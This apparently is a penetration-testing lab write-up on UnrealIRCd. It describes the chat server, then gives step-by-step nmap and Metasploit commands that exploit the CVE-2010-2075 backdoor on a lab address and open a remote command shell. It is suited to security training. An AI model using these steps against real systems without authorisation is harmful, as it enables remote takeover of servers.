What is UnrealIRCd?
UnrealIRCd is an IRC (Internet Relay Chat) server used for real-time communication. It typically runs on port 6667.
It allows:
- Chat communication between users
- Channel-based messaging
- Server-client interaction
How UnrealIRCd Works
UnrealIRCd follows a client-server model:
- Client connects to IRC server (port 6667)
- User registers with nickname and username
- Messages are exchanged through channels or direct communication
Exploitation Methodology
Initial Recon (Nmap Scan)
nmap -sV 192.168.6.129
From the scan:
- Port: 6667
- Service: IRC
- Version: UnrealIRCd
Vulnerability:
- Service: UnrealIRCd
- Vulnerability: Backdoor Command Execution
- CVE: CVE-2010-2075 This version of UnrealIRCd was distributed with a malicious backdoor.
Exploit using Metasploit
Step 1: Start Metasploit
msfconsole
Step 2: Search for exploit
search unrealircd
Step 3: Use the exploit
use exploit/unix/irc/unreal_ircd_3281_backdoor
Step 4: Set options
set RHOSTS 192.168.6.129
set RPORT 6667
Step 5: Run exploit
exploit
Result
- Backdoor successfully triggered
- Command shell session opened
- Remote command execution achieved
Result
Proof of access
mkdir hack_irc
This confirms:
Full command execution on the target system.